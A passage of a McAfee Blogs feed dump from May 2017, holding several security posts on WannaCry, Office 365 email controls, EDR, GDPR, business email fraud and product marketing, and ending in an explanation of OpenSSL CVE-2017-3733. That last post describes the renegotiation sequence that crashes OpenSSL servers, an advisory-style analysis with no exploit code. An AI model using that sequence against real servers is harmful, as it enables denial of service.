Des incidents majeurs tels que WannaCry vont probablement peser dans la balance lors de cette analyse. Il arrive souvent que les équipes de sécurité interprètent l’absence d’attaques comme une preuve de l’efficacité de leurs défenses. Or, il n’en est rien. Il est tout à fait possible que des entreprises négligentes dans l’application de patchs n’aient pas subi d’attaques exploitant les vulnérabilités concernées. Cela peut renforcer l’idée qu’un déploiement différé n’est pas problématique.

Or, cette attaque massive du mois de mai doit rappeler aux entreprises qu’elles doivent absolument adopter une stratégie rigoureuse de correction des vulnérabilités dans leur environnement.

Pourquoi les hôpitaux ?

Les hôpitaux sont des cibles vulnérables, car leur première préoccupation est bien évidemment les soins aux patients, et pas le déploiement des meilleures technologies de cyberdéfense ou le recrutement de personnel qualifié en cybersécurité.

De fait, jusqu’à présent, les cybercriminels avaient très peu à gagner avec ces établissements. Il était toujours possible de voler les dossiers médicaux ou d’autres types de données, mais en termes de valeur totale, les données provenant d’un hôpital étaient généralement moins attrayantes que celles subtilisées à des entreprises de secteurs comme les services financiers.

Avec le modèle économique criminel des ransomwares, tous les secteurs d’activité deviennent des cibles potentiellement intéressantes. Puisque l’objectif du cyberpirate est la rançon, il est plus aisé de s’en prendre à une structure aux cyberdéfenses faibles plutôt qu’à une entreprise dotée d’un dispositif de protection performant. Voilà pourquoi des hôpitaux, des bureaux de police, des établissements d’enseignement et des universités ont été frappés par des ransomwares l’année dernière. Nous commençons à observer également un intérêt accru pour des entreprises moins vulnérables, mais pour l’instant du moins, les pirates disposent encore de nombreuses opportunités de cibler ces proies plus faciles.

Et demain ?

Même si l’attaque WannaCry présente des caractéristiques inédites, dont il faudra tenir compte à l’avenir, lorsqu’une vulnérabilité est signalée publiquement et qu’un exploit est diffusé au risque d’être utilisé par des cybercriminels, nous devons nous attendre à une attaque de ce genre et nous y préparer. Et, très vite, à de nombreuses autres qui s’en seront inspirées.

 

The post WannaCry : les vers d’hier font peau neuve appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/languages/francais/wannacry-les-vers-dhier-font-peau-neuve/feed/ 0
Email, email, in the cloud https://securingtomorrow.mcafee.com/business/cloud-security/email-email-in-the-cloud/ Thu, 11 May 2017 23:10:14 +0000 https://securingtomorrow.mcafee.com/?p=73903 As my company continues to move enterprise applications to the cloud, the latest development presents a security opportunity. We are giving up our on-premises Microsoft Exchange email in favor of the Microsoft Office 365 service. With the transition, we might be able to curtail the common employee practice of communicating and storing sensitive business-related data …

The post Email, email, in the cloud appeared first on McAfee Blogs.

]]>
As my company continues to move enterprise applications to the cloud, the latest development presents a security opportunity. We are giving up our on-premises Microsoft Exchange email in favor of the Microsoft Office 365 service. With the transition, we might be able to curtail the common employee practice of communicating and storing sensitive business-related data in email.

Trouble Ticket

At issue: The company email system is moving to the cloud.
Action plan: Work with IT to make sure information is better secured after the change than it is now.

I am encouraging the IT organization to tighten security by implementing controls that were either not available in our on-premises deployment or never implemented. The first order of business is a cleanup of accounts and distribution lists. We have hundreds of email-enabled distribution lists, and too many of them are available to the world. We should be able to cut down the number of lists and set rules about who can use them.

For example, one list that includes all members of the customer support team has been available to anyone, though only internal employees have a need for it. Customers will have access to a separate support distribution list that will integrate with Salesforce to automatically generate a support ticket.

We will also restrict to managers the ability to send to “all.” Too many people use the “all” alias to send messages that most employees perceive as spam. That’s a problem in a growing company.

Then there’s auto-forwarding. Doing it internally is one thing (having your mail go to a co-worker while you’re on vacation, for example), but auto-forwarding to personal email accounts simply increases the potential for data loss. Now we can disable auto-forwarding for some employees or restrict the domains they can auto-forward mail to.

Another issue involves the devices users access email on. I don’t want them to install the Outlook client on non-corporate computers. This could be especially risky on public computers, such as in hotel lobbies, because the mail will stay on the device after log-off. We will try to circumvent that risk by requiring that employees use our corporate single sign-on (SSO) solution to log into Outlook. One plus is that our SSO uses multifactor authentication, but it also can be configured to restrict Outlook access to one device (presumably the corporate-issued device). Another way to restrict access is to issue a machine certificate to the corporate PC and configure Office 365 to allow connections only from machines with valid certificates.

Eventually we will deploy a robust third-party mobile device management application to employees who use their phones for business purposes. Until then, we will use the built-in mobile device policies that come with Office 365. These include password requirements, device timeout, encryption, brute-force protection, restrictions against jailbroken devices and the ability to selectively wipe phones (corporate mail only) when a user leaves the company.

We’ll use what Microsoft calls “MailTips” to help with data loss prevention. For instance, if a user creates an email containing sensitive data, such as a credit card number, MailTips will send a warning that that is a bad practice. Similar warnings will be issued when users try to send emails to a distribution list that contains an external user.

We will also prevent users from pulling in webmail to Outlook. It’s best to ban that activity outright because we just can’t vouch for the integrity of those personal messages, and we also don’t want to store it on corporate devices.

Finally, we will (of course) enable any and all malware and spam protection. I’ve always said that if my company is going to get hacked, it will most likely result from someone clicking on something in an email. Anything I can do to block malicious emails is well worth the effort. This includes blocking certain email attachments, such as executable files and scripts, that are typically associated with malware. We will also continue to enforce Sender Policy Framework (SPF), which validates the IP address of the email sender.

There are other more advanced configuration options that Microsoft offers that we will evaluate and deploy, so long as they don’t impact our ability to conduct business. The last thing I want is to implement so many restrictions that legitimate email is prevented from reaching its destination. As always in this job, it’s all about finding that balance of security and usability.

This journal is written by a real security manager, “Mathias Thurman,” whose name and employer have been disguised for obvious reasons.

 

This article was written by Mathias Thurman from Computerworld and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

The post Email, email, in the cloud appeared first on McAfee Blogs.

]]>
The EDR Balancing Act: Impact vs. Ability to Execute https://securingtomorrow.mcafee.com/business/dynamic-endpoint/edr-balancing-act/ https://securingtomorrow.mcafee.com/business/dynamic-endpoint/edr-balancing-act/#respond Thu, 11 May 2017 15:00:40 +0000 https://securingtomorrow.mcafee.com/?p=73829 A new breed of advanced malware has its sights on your business. It’s been cleverly crafted to evade standard defenses, burrow into your endpoints, and hide undetected, indefinitely, waiting to spread to other systems. Unfortunately, this is now day-to-day reality for most organizations. The question is what to do about it. Here’s the way organizations …

The post The EDR Balancing Act: Impact vs. Ability to Execute appeared first on McAfee Blogs.

]]>
A new breed of advanced malware has its sights on your business. It’s been cleverly crafted to evade standard defenses, burrow into your endpoints, and hide undetected, indefinitely, waiting to spread to other systems. Unfortunately, this is now day-to-day reality for most organizations. The question is what to do about it.

Here’s the way organizations would like to respond: A top security investigator identifies a new malware threat. Using the latest and greatest endpoint detection and response (EDR) tools, she hunts for similar threats in the environment and roots out every other infected system. She learns exactly what the malware did and how, remediates the problem everywhere it exists, and updates defenses to block similar attacks in the future.

Unfortunately, here’s what actually happens: An endpoint administrator encounters an infected machine. He re-images the endpoint and puts the user back online. In the back of his mind, he knows he didn’t actually solve the problem that allowed the infection in the first place. He knows there’s a good chance it’s spread to other endpoints. But the few expert investigators in the organization are already buried in work. And sifting through mountains of data to manually search for the threat would take weeks.

You can see the disconnect. Modern EDR tools can provide amazing defense capabilities. But there just aren’t enough people out there who can use them effectively. According to a 2016 global survey from Intel Security and the Center for Strategic and International Studies, 82 percent of organizations report a shortage of cybersecurity skills. Meanwhile, threats continue to increase.

There’s a way out of this catch-22, but it requires a different way of thinking about EDR. Incident detection and response doesn’t have to be limited to advanced toolsets for specialized experts. By taking advantage of integrated EDR capabilities integrated into modern endpoint security platforms, you may be able to accomplish a lot more than you realize.

Generally, incident response falls across four categories: detect, contain, investigate, remediate. Modern endpoint platforms can integrate with EDR to provide more visibility and automated capabilities across all those categories, so that front-line administrators can shoulder a lot more of that burden than they used to.

Modern integrated endpoint solutions include:

  • File search: If an administrator can use Google, they should be able to use basic EDR interface to search for a known malware file. With literally one click, the should be able to see a graphical map of every endpoint where the file resides.
  • Hash search: In the same way, any administrator who can copy and paste a file hash should be able to search malware they’ve encountered on an endpoint to see, in seconds, everywhere else it’s spread.
  • Automated remediation: When an admin does identify an infection, he’ll want to remove it from every infected endpoint with one click.
  • Automated inoculation: With another click, the administrator could update every other endpoint and security system in the environment to recognize that malware in the future and block it before it executes.

Compare that to the status quo, where each of these activities—correlating a suspected threat, discovering all endpoints it’s infected, removing it, tuning other security solutions (IPS, firewall, web gateways, endpoint agents) to detect it in the future—requires enormous manual effort.

Integrated EDR in Action

How much EDR should happen as part of everyday endpoint operations versus projects spearheaded by specialized experts? There’s no single right answer—it’s about balancing the potential impact of a given activity with your ability to execute. If you’re going to find the right EDR formula for your organization, you need to be honest with yourself about your personnel and investments.

State-of-the-art EDR platforms can provide amazing visibility and incident response capabilities—they can have a huge impact. But the cost to execute is extremely high. Alternatively, endpoint defense platforms with integrated EDR capabilities may not deliver exactly the same impact, but the cost to execute is much lower. With integrated EDR tools and automated workflows, many aspects of investigation and response can be handled by administrators with minimal training.

Integrated EDR may not replicate everything a skilled investigator can do with the most powerful EDR platforms. But if you can accomplish 80 percent of the results with a fraction of the effort, at a fraction of the cost, that’s a pretty good balance of impact and ability to execute.

Get Started

To learn more about finding the right EDR balance for your organization, check out Gartner’s Market Guide for Endpoint Detection and Response Solutions.

The post The EDR Balancing Act: Impact vs. Ability to Execute appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/dynamic-endpoint/edr-balancing-act/feed/ 0
“Stronger and Lighter” − An Early Adopter Compares Before vs After McAfee ENS https://securingtomorrow.mcafee.com/business/stronger-lighter-%e2%88%92-early-adopter-compares-vs-mcafee-ens/ https://securingtomorrow.mcafee.com/business/stronger-lighter-%e2%88%92-early-adopter-compares-vs-mcafee-ens/#respond Thu, 11 May 2017 14:00:30 +0000 https://securingtomorrow.mcafee.com/?p=73646 When Philippe Maquoi heard about McAfee Endpoint Security (ENS), he immediately signed up to became one of its first beta testers. “I had been looking for a product like ENS for some time,” he says, “and I had confidence that McAfee was capable of giving me such a product.” As head of the SPW Endpoint …

The post “Stronger and Lighter” − An Early Adopter Compares Before vs After McAfee ENS appeared first on McAfee Blogs.

]]>
When Philippe Maquoi heard about McAfee Endpoint Security (ENS), he immediately signed up to became one of its first beta testers. “I had been looking for a product like ENS for some time,” he says, “and I had confidence that McAfee was capable of giving me such a product.”

As head of the SPW Endpoint and Server Security team, Philippe Maquoi oversees information security for Service Public de Wallonie (SPW), the public administration arm of the regional government of Wallonia, the French-speaking region of Belgium. Maquoi and his team are responsible for securing the 9,000 desktops, 1,300 servers, and 1,000 major applications used by the government’s more than 8,000 employees.

Maquoi’s team initially migrated 1,000 computers to McAfee ENS version 10.2 and plans to migrate all 9,000 endpoints to ENS version 10.5 imminently. Although Maquoi can’t wait to take full advantage of the Real Protect machine learning and behavioral detection functionality in the most recent version of ENS, he has already seen tremendous benefits from implementing ENS 10.2.

“What I like best about McAfee ENS so far is that it is both stronger and lighter,” says Maquoi. “By that I mean it has superior detection and prevention technology that protects us better against present and future threats, but it is also easier to manage. Both aspects are equally important.”

Better Protection, Time Savings, and More with McAfee ENS

Since SPW initially installed ENS on some but not all nodes, it was easy to compare the impact of the new endpoint security framework to the previous endpoint protection. Take, for instance, when Nemucod ransomware attacked the organization and a handful of users, some on desktops with McAfee ENS and some on desktops without it, clicked on a button embedded in the phishing email. On the desktops not yet migrated to ENS, the user’s action triggered a JavaScript that downloaded the ransomware—which resulted in two days of work restoring corrupted administrative shares. On the desktops protected by ENS, however, the JavaScript was prevented from executing and users continued working, business as usual.

Maquoi’s team has also seen significant operational time savings compared to dealing with endpoints not yet protected by ENS. For starters, none of his team had to spend time re-mediating on the ENS-protected desktops after the ransomware attack just mentioned. With McAfee ENS, there is less administrative overhead, which also frees up time.

“McAfee ENS is smart enough to stop threats without us having to manually create a bunch of rules, as we had to do in the past,” he states. “Also, instead of having to push out and update multiple agents for various aspects of protection—a HIPS agent, a web content control agent, and so on—booting and rebooting each time, with ENS we have a stronger toolset, encompassed in one product, with just one agent to deal with.”

In addition, for ENS-protected machines, Maquoi says his team no longer has to listen to complaints from angry users on scan day. With malware scanning no longer impacting the performance of those devices, their users are now much happier and more productive.

Furthermore, by migrating to McAfee ENS, SPW is laying the foundation for an adaptable, sustainable threat defense lifecycle. That’s because McAfee ENS is built to communicate using the McAfee Data Exchange Layer (DXL) fabric, which enables near real-time exchange of local and global threat information among diverse security systems via McAfee Threat Intelligence Exchange. Consequently, in the near future when SPW implements McAfee Advanced Threat Defense (ATD) for in-depth sandbox analysis, SPW endpoints will be able to receive threat information directly from ATD and send information directly to ATD, creating even stronger threat detection capabilities and enabling even faster response.

To read the full case study on Service Public de Wallonie, click here. Get your questions answered by tweeting @McAfee.

The post “Stronger and Lighter” − An Early Adopter Compares Before vs After McAfee ENS appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/stronger-lighter-%e2%88%92-early-adopter-compares-vs-mcafee-ens/feed/ 0
5 tips for achieving GDPR compliance https://securingtomorrow.mcafee.com/business/safeguard-data/5-tips-for-achieving-gdpr-compliance/ Wed, 10 May 2017 22:50:14 +0000 https://securingtomorrow.mcafee.com/?p=73864 The European General Data Protection Regulation will have a global impact when it goes into effect on May 25, 2018, according to Gartner Inc. And the firm predicts that by the end of 2018 more than half of companies affected by GDPR will not be in full compliance with its requirements. “The GDPR will affect …

The post 5 tips for achieving GDPR compliance appeared first on McAfee Blogs.

]]>
The European General Data Protection Regulation will have a global impact when it goes into effect on May 25, 2018, according to Gartner Inc. And the firm predicts that by the end of 2018 more than half of companies affected by GDPR will not be in full compliance with its requirements.

“The GDPR will affect not only EU-based organizations, but many data controllers and processors outside the EU as well,” said Bart Willemsen, research director at Gartner. “Threats of hefty fines, as well as the increasingly empowered position of individual data subjects tilt the business case for compliance and should cause decision makers to re-evaluate measures to safely process personal data.

Gartner recommends that organizations act now to ensure they are compliant when the regulation takes effect. They should focus on five high-priority changes to get up to speed with GDPR requirements:

Determine your role under the GDPR

Any organization that decides on why and how personal data is processed is essentially a “data controller,” Gartner said. So GDPR applies not only to businesses in the European Union but to all organizations outside the EU processing personal data for the offering of goods and services to the EU, or monitoring the behavior of data subjects within the EU.

Appoint a data protection officer

Many organizations are required to appoint a data protection officer, and this is especially important when the organization is a public body, is processing operations requiring regular and systematic monitoring, or has large-scale processing activities, Gartner said.

Demonstrate accountability in all processing activities

Few organizations have identified each process where personal data is involved, the firm said. Going forward, data quality and data relevance should be decided on when starting a new processing activity, it said, as this will help to maintain compliance in future personal data processing activities. Organizations need to demonstrate an accountable posture and transparency in all decisions regarding personal data processing activities.

Check cross-border data flows

Data transfers to any of the 28 EU member states are still allowed, as well as to Norway, Liechtenstein and Iceland, Gartner sais. Transfers to any of the other 11 countries the European Commission (EC) deemed to have an “adequate” level of protection are also still possible. Outside of these areas, appropriate safeguards should be used.

Prepare for data subjects exercising their rights

Data subjects have extended rights under the GDPR, Gartner said. These include the right to be forgotten, to data portability and to be informed of data breaches. If a business isn’t prepared to adequately handle data breach incidents and subjects exercising their rights, now is the time to start implementing additional controls, the firm said.

 

This article was written by Bob Violino from Information Management and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

The post 5 tips for achieving GDPR compliance appeared first on McAfee Blogs.

]]>
Don’t Let Cybercriminals Give You the Wedding Bell Blues https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/cybercriminals-give-wedding-bell-blues/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/cybercriminals-give-wedding-bell-blues/#respond Wed, 10 May 2017 13:00:20 +0000 https://securingtomorrow.mcafee.com/?p=73789 It’s springtime, which means flowers are blooming, the sun is shining, and wedding season is starting. Back in my day, weddings were organized by hand, invitations were hand-written, we called and organized registries in person and over the phone. All wedding-planning activities were handled the old-fashioned way. Fast-forward to 2017 and everything, from our relationships …

The post Don’t Let Cybercriminals Give You the Wedding Bell Blues appeared first on McAfee Blogs.

]]>
It’s springtime, which means flowers are blooming, the sun is shining, and wedding season is starting. Back in my day, weddings were organized by hand, invitations were hand-written, we called and organized registries in person and over the phone. All wedding-planning activities were handled the old-fashioned way. Fast-forward to 2017 and everything, from our relationships to how we communicate with loved ones, has changed thanks to the Internet. So, naturally, the way we plan weddings has changed too. Practically every aspect of planning the big day has gone digital, putting a lot of your — and your guests’ — personal data online.

My daughter, Amber, is the perfect example of how modern wedding planning operates online, and showcases just how much personal data is required to make a wedding a success. When preparing for her special day, Amber and her husband Michael registered for a site called  “Wedding Wire.” They used this site to build a wedding database, manage their RSVP list, and look for local vendors.  Amber loved the site’s ease-of-use, especially when it came to managing events from her mobile device, but as a dad, and cybersecurity evangelist, the first thing that came to my mind was how much personal data she was openly sharing with the site – and all those connected to it.

The site streamlines the whole wedding process by organizing venues, vendors, registry, all in one place. But consolidating data online is always a risk. Cybercriminals, who know brides and grooms are willing to put a lot on the line to create their dream wedding, can potentially compromise your personal data – like credit card information, email addresses, home addresses – in one location.

The same thing goes for social media. My daughter used social media heavily throughout her wedding. Not only did she have an Instagram hashtag, but guests frequently shared photos and posts on Facebook. While sharing the wedding day details over social media may seem harmless, it potentially provides cybercriminals with the details they need to launch phishing attacks and more. These attacks could not only target her, but friends, family and other wedding guests who can be lulled into a sense of nostalgia shortly after the big day.

So, when you’re planning your big day, make sure to keep your memories and your information private by following these tips:

-Spread your data out. Amber decided to centralize her planning process by doing everything with one site, which was efficient, but not the most secure. If one vendor gets compromised by a cybercriminal, it could mean connected information could be exposed as well. So, make sure that your personal information isn’t a one stop shop for cybercriminals by making using different service sites for each part of the process.

-Show your password some love. For whatever websites you do use to plan your wedding, make sure you create a strong, unique password when you’re setting up your account. Since you’re sharing personal, and financial information with these sites, it’s crucial to lock your account with a strong and complex password. And if you’re struggling to remember all of your passwords to these sites, use a password manager like the True Key app to secure all of your various accounts.

-Protect your personal data with comprehensive security. Whether you’re sharing your financial information with an online vendor, or using social media to help spread the love, ensure all of your devices are secure with McAfee LiveSafe.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post Don’t Let Cybercriminals Give You the Wedding Bell Blues appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/cybercriminals-give-wedding-bell-blues/feed/ 0
Become a Modern Endpoint Security Master https://securingtomorrow.mcafee.com/business/dynamic-endpoint/become-modern-endpoint-security-master/ https://securingtomorrow.mcafee.com/business/dynamic-endpoint/become-modern-endpoint-security-master/#respond Tue, 09 May 2017 23:00:08 +0000 https://securingtomorrow.mcafee.com/?p=73821 A new wave of advanced, targeted malware is seeking out the gaps in conventional endpoint defenses and finding novel ways to exploit them. These attacks use packing, encryption, and polymorphism to mask their true intent, hammering away at your organization with previously unseen “zero-day” attacks that signature-based mechanisms are too slow to catch. They use …

The post Become a Modern Endpoint Security Master appeared first on McAfee Blogs.

]]>
A new wave of advanced, targeted malware is seeking out the gaps in conventional endpoint defenses and finding novel ways to exploit them. These attacks use packing, encryption, and polymorphism to mask their true intent, hammering away at your organization with previously unseen “zero-day” attacks that signature-based mechanisms are too slow to catch. They use sophisticated executables that can recognize when they’re being sandbox-analyzed and delay execution. They weaponize legitimate files and applications that appear clean on the surface but have malicious code buried deep within.

It all adds up to a nonstop, overwhelming effort as your endpoint administrators race against the clock to detect, contain, and remediate new malware threats. And if you’re like many organizations, this is a race you’re losing far too often. Too many threats get through. Too many resources are needed to sift through alerts from multiple siloed point solutions and clean up infections. And the time between detection and remediation keeps growing.

There’s an underlying problem here that may sound familiar. When you’re relying on multiple siloed endpoint defense products that can’t talk to each other, you require extra steps and manual effort from your administrators. That takes time and slows your response. Why not try a different approach? Instead of racing around swiveling between half a dozen siloed security tool interfaces, what if your team could use next-generation machine learning techniques to stop most threats before they ever gain a foothold on your endpoints? What if you had a unified, fully integrated, multi-layered defense fabric that could respond to new events and information immediately, without human intervention?

Peel Away the Malware Mask

Next-generation anti-malware capabilities from McAfee can help your organization combat the most evasive modern threats. Drawing on powerful machine learning analysis and application containment tools, your team can unmask hidden threats and stop them in their tracks—much faster with much less effort. These capabilities are delivered through three new innovations:

  • Real Protect Static: Malware authors may be able to change how their code looks, but it’s still malware. So it’s likely to share many attributes with known attacks, such as the compiler used, the shared libraries it references, and many other features. Real Protect Static pre-execution analysis goes beneath the surface, performing an exhaustive machine learning statistical comparison of static binary code features to compare suspicious executables against known threats. It unmasks most malware for what it is in milliseconds, without signatures.
  • Real Protect Dynamic: Even if a sophisticated attack masks its static attributes, it can’t hide how it behaves. Real Protect Dynamic behavioral analysis also provides machine learning statistical analysis, but now comparing the code’s actual behavior against profiles of hundreds of millions of malware samples. The executable is allowed to run while being closely monitored by the endpoint. If it starts behaving maliciously—such as overwriting files or making registry changes that match known malware behavior—the endpoint shuts it down, typically within seconds.
  • Dynamic Application Containment: This new endpoint defense, available only from McAfee, protects against zero-day malware by blocking process actions that malware often uses. Unlike techniques that would hold up the file (and the user) for minutes at a time, Dynamic Application Containment lets the suspicious file load into memory without allowing it to make certain changes to the endpoint or infect other systems while it is under suspicion. The endpoint and user can remain fully productive while providing an opportunity for security teams to perform in-depth analysis.

With these capabilities, your administrators can stop most threats before they can damage an endpoint. They can take on the most sophisticated, evasive malware without needing a team of highly trained security experts. They can fine-tune application containment tools to restrict what can happen on endpoints, and achieve the right balance of security and flexibility for the organization.

Drive Down Complexity, Accelerate Response

Real Protect and Dynamic Application Containment work with each other, as well as the other elements of McAfee Endpoint Security, and with other solutions such as McAfee Threat Intelligence Exchange and McAfee Advanced Threat Defense as a single, integrated system. For example, when Real Protect identifies an evasive threat as zero-day malware, it immediately communicates that information to McAfee Threat Intelligence Exchange, which then automatically inoculates the broader environment, in near real time.

The result is a continually evolving threat model for your organization. Each new threat detected enhances the organization’s defenses as a whole. Previously manual steps in the detect, correct, and protect phases of the threat defense lifecycle disappear. And you gain the flexibility to mix and match the industry’s broadest portfolio of threat defense capabilities through a single interface.

Armed with these capabilities, your team can:

  • Unmask the attack: Stop more attacks by stripping away obfuscation techniques to see more malware threats.
  • Limit the impact: Contain, shield, and prevent damage to systems, either before an attack occurs or before it can cause irreversible damage or infection.
  • Track and adapt: Use automated, integrated defenses to perform a wider range of security operations without having to think about them or manually activate them.

Learn More

Join McAfee and Forrester as we discuss more tips on mastering modern endpoint security:

Americas

May 10, 2:00 PM EDT

Watch On-Demand

EMEA

May 10, 3:00 PM BST

Watch On-Demand

APAC

May 10, 3:00 PM AEST

Watch On-Demand

The post Become a Modern Endpoint Security Master appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/dynamic-endpoint/become-modern-endpoint-security-master/feed/ 0
Phishing Scams Cost American Businesses Half A Billion Dollars A Year https://securingtomorrow.mcafee.com/business/neutralize-threats/phishing-scams-cost-american-businesses-half-a-billion-dollars-a-year/ Tue, 09 May 2017 21:09:34 +0000 https://securingtomorrow.mcafee.com/?p=73813 These days, the FBI devotes a lot of time and effort to cybercrimes, particularly those they refer to as business email compromise scams. BECs are a type of phishing attack in which criminals target businesses that frequently send international wire transfers, and they can involve huge sums of money. A report issued this week by …

The post Phishing Scams Cost American Businesses Half A Billion Dollars A Year appeared first on McAfee Blogs.

]]>
These days, the FBI devotes a lot of time and effort to cybercrimes, particularly those they refer to as business email compromise scams. BECs are a type of phishing attack in which criminals target businesses that frequently send international wire transfers, and they can involve huge sums of money. A report issued this week by the Bureau reveals just how huge.

From October 2013 to December 2016, the FBI investigated just over 22,000 of these incidents involving American businesses. In total, they saw losses approaching $1.6 billion. That’s roughly $500 million every year being scammed and dollar figures involved have climbed sharply – up 2370% between Janury 2015 and last December.

No business is immune from BECs, it seems. There have been victims in all 50 states, and for the most part no one segment is targeted more frequently than another. Attackers are, however, giving more attention to parties involved in real estate transactions. Lawyers and realtors remained in the crosshairs, but the Internet Crime Complaint Center received almost five times as many reports from title companies last year.

It’s easy enough to see why real estate phishing is on the rise: large sums of money change hands and there are several potential weak links in the transaction process. Compromising any one of those with a successful phish of account details can give an attacker access to a trusted email address from which to launch the second stage of the attack. The fraudster can lie in wait skimming emails for information about a transaction and then send off fraudulent wire instructions to a buyer, seller, or escrow agent when the time is right.

The closing section of the FBI bulletin offers several tips for avoiding BECs, and they’re worth studying whether or not you own or operate a business. Among them: being more cautious when requests are urgent or secrecy is requested, closely scrutinizing any communications (sender’s email address, writing style, etc.) involving financial details, and implementing two-factor authentication to minimize the potential for account breaches.

 

This article was written by Lee Mathews from Forbes and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

The post Phishing Scams Cost American Businesses Half A Billion Dollars A Year appeared first on McAfee Blogs.

]]>
Security Automation is Here —The Time is Now: 60% of respondents think manual processes are holding back security effectiveness https://securingtomorrow.mcafee.com/business/optimize-operations/security-automation-time-now-60-respondents-think-manual-processes-holding-back-security-effectiveness/ https://securingtomorrow.mcafee.com/business/optimize-operations/security-automation-time-now-60-respondents-think-manual-processes-holding-back-security-effectiveness/#respond Tue, 09 May 2017 19:39:40 +0000 https://securingtomorrow.mcafee.com/?p=73787 Time was, automation was a dirty word in security. Now, it is a necessity. A new Enterprise Strategy Group (ESG) survey, sponsored by McAfee and other technology vendors, shows that 3 out of 5 organizations see manual processes as holding them back from better organizational effectiveness when it comes to security analytics and operations. My …

The post Security Automation is Here —The Time is Now: 60% of respondents think manual processes are holding back security effectiveness appeared first on McAfee Blogs.

]]>
Time was, automation was a dirty word in security. Now, it is a necessity. A new Enterprise Strategy Group (ESG) survey, sponsored by McAfee and other technology vendors, shows that 3 out of 5 organizations see manual processes as holding them back from better organizational effectiveness when it comes to security analytics and operations. My rule of thumb is: The third time you do the same thing, automate it. That doesn’t mean automating actions like wiping a system or rebooting, but it does mean you get the machines to do the easy work. Automation can mean setting a policy, defining an alarm or quarantine based on a trigger, defining a correlation rule to make the same review decision you had been doing and then setting an alarm or creating a watchlist, or using a script to package and forward data. Any of these approaches is easily implemented with today’s technology.

A case in point – the  findings also show that the #1 priority for automation and/or orchestration is integrating external threat intelligence with internal security data collection and analysis. That capability is entirely automated today with the McAfee Enterprise Security Manager. You can consume IOCs and mine your database to see if they are already part of your environment, generating alarms for any matches, and also set a watch in case these IOCs enter your infrastructure in the future. The watchlist can also implement an action you define – from simple alarm to active quarantine. Check out this video to see for yourself.

ESG Research, Cybersecurity Analytics and Operations Survey, April 2017.

The post Security Automation is Here —The Time is Now: 60% of respondents think manual processes are holding back security effectiveness appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/optimize-operations/security-automation-time-now-60-respondents-think-manual-processes-holding-back-security-effectiveness/feed/ 0
Vulnerable OpenSSL Handshake Renegotiation Can Trigger Denial of Service https://securingtomorrow.mcafee.com/mcafee-labs/vulnerable-openssl-handshake-renegotiation-can-trigger-denial-service/ https://securingtomorrow.mcafee.com/mcafee-labs/vulnerable-openssl-handshake-renegotiation-can-trigger-denial-service/#respond Tue, 09 May 2017 18:54:01 +0000 https://securingtomorrow.mcafee.com/?p=73629 OpenSSL, the popular general-purpose cryptographic library that implements SSL/TLS protocols for web authentication, has recently suffered from several vulnerabilities. We have written about “CVE-2017-3731: Truncated Packets Can Cause Denial of Service in OpenSSL” and “SSL Death Alert (CVE-2016-8610) Can Cause Denial of Service to OpenSSL Servers” among others. Today we examine the high-severity bug CVE-2017-3733, …

The post Vulnerable OpenSSL Handshake Renegotiation Can Trigger Denial of Service appeared first on McAfee Blogs.

]]>
OpenSSL, the popular general-purpose cryptographic library that implements SSL/TLS protocols for web authentication, has recently suffered from several vulnerabilities. We have written about “CVE-2017-3731: Truncated Packets Can Cause Denial of Service in OpenSSL” and “SSL Death Alert (CVE-2016-8610) Can Cause Denial of Service to OpenSSL Servers” among others. Today we examine the high-severity bug CVE-2017-3733, the Encrypt-Then-MAC renegotiation crash that can cause a denial of service.

Before SSL/TLS encrypts data, it runs the Handshake and ChangeCipherSpec protocols.

During the Handshake phase, the client and server decide which encryption algorithms to use. Once the negotiation is done, the client and the server send each other a ChangedCipherSpec message, after which the traffic is encrypted with the negotiated algorithms.

Encrypted data is sent in one of two ways along with the message authentication code (MAC) in SSL/TLS.

  1. MAC-then-encrypt: This method calculates the MAC of the plain text, concatenates it with the plain text, and runs the encryption algorithm over it.
  2. Encrypt-then-MAC: The cipher-text is generated by encrypting the plaintext and then appending a MAC of the encrypted plaintext.

If the ClientHello message does not contain an Encrypt-Then-Mac extension, then the default is MAC-then-encrypt mode. If ClientHello has an Encrypt-Then-Mac extension, the server will compute the MAC after encrypting the data.

If the client or server wish to change the algorithms used for encryption, they can renegotiate the Cipher_Suites that they have already agreed upon. This can occur any time during data transfer by initiating a new Handshake, which takes place over an existing SSL connection.

Triggering the vulnerability

OpenSSL offers this explanation:

“During a renegotiation handshake if the Encrypt-Then-Mac extension is negotiated where it was not in the original handshake (or vice-versa) then this can cause OpenSSL to crash (dependent on ciphersuite). Both clients and servers are affected.”

Say the client starts a TLS handshake with the server using the default MAC-then-encrypt mode. If the client later renegotiates with the Encrypt-then-MAC extension enabled and sends encrypted data in that mode before the ChangeCipherSpec message, the server will crash, causing a denial of service.

When the client triggers this vulnerability, the server crashes at the ssl3_get_record function, in the ssl3_record.c file:

The crash occurs at line no. 352, when checking to see if mac_size is less than EVP_MAX_MD_SIZE (64 bytes):

The if statement preceding the assertion checks whether the Encypt-then-MAC flag is set in the server. The macro in the if condition:

The flag TLS1_FLAGS_ECRYPT_THEN_MAC is already set when the ClientHello packet is sent with the Encrypt-then-MAC extension at the time of renegotiation. So the control will go inside the if condition. But because the ChangeCipherSpec message has not yet passed to the server, it does not know it must use Encrypt-then-MAC.

Putting a break point at line no. 352 and checking the mac_size variable shows us the value 0xffffffff, which is greater than EVP_MAX_MD_SIZE (64). Thus the assertion fails and the server crashes.

Let’s go to the code and find how the mac_size variable gets the value 0xffffffff. The EVP_MD_CTX_size function calculates the mac_size.

It returns -1 when the message digest value is null. 0xffffffff is the two’s complement of -1. This means “s->read_hash” returns null as the server tries to calculate the hash using the MAC-then-encrypt mode.

